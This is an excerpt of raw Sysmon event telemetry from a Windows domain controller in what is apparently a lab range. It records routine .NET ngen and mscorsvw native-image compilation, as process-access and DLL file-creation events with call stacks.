10341000x80000000000000008784Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:42.653{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4692-6000-A404-000000009A01}1020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008783Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:42.638{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4692-6000-A404-000000009A01}1020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008782Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:42.638{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4692-6000-A404-000000009A01}1020C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008781Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:42.591{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4692-6000-A304-000000009A01}4424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008780Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:42.575{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4692-6000-A304-000000009A01}4424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008779Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:42.575{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4692-6000-A304-000000009A01}4424C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008778Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:42.513{08A6967A-4692-6000-A204-000000009A01}4736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1280-0\System.ServiceModel.Routing.dll2021-01-14 13:26:42.513 10341000x80000000000000008777Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:42.200{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4692-6000-A204-000000009A01}4736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008776Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:42.185{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4692-6000-A204-000000009A01}4736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008775Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:42.185{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4692-6000-A204-000000009A01}4736C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008774Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:42.122{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4692-6000-A104-000000009A01}4800C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008773Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:42.107{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4692-6000-A104-000000009A01}4800C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008772Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:42.107{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4692-6000-A104-000000009A01}4800C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008771Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:42.028{08A6967A-4691-6000-A004-000000009A01}3280C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\cd0-0\System.ServiceModel.Internals.dll2021-01-14 13:26:42.028 10341000x80000000000000008795Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:43.966{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4693-6000-A704-000000009A01}2256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008794Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:43.950{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4693-6000-A704-000000009A01}2256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008793Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:43.950{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4693-6000-A704-000000009A01}2256C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008792Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:43.872{08A6967A-4692-6000-A604-000000009A01}4744C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\1288-0\System.ServiceModel.Web.dll2021-01-14 13:26:43.872 10341000x80000000000000008801Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:44.982{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-4694-6000-A904-000000009A01}592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008800Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:44.982{08A6967A-44E3-6000-3401-000000009A01}7284492C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4694-6000-A904-000000009A01}592C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000008799Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.localDLL2021-01-14 13:26:44.888{08A6967A-4694-6000-A804-000000009A01}3672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\e58-0\System.Speech.dll2021-01-14 13:26:44.888 10341000x80000000000000008798Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:44.091{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4694-6000-A804-000000009A01}3672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008797Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:44.075{08A6967A-4286-6000-0500-000000009A01}6362368C:\Windows\system32\csrss.exe{08A6967A-4694-6000-A804-000000009A01}3672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008796Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:44.075{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4694-6000-A804-000000009A01}3672C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008805Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:45.263{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4695-6000-AA04-000000009A01}3088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+61b6a|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008804Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:45.247{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-4695-6000-AA04-000000009A01}3088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008803Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:26:45.247{08A6967A-44E3-6000-3401-000000009A01}7284996C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{08A6967A-4695-6000-AA04-000000009A01}3088C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\m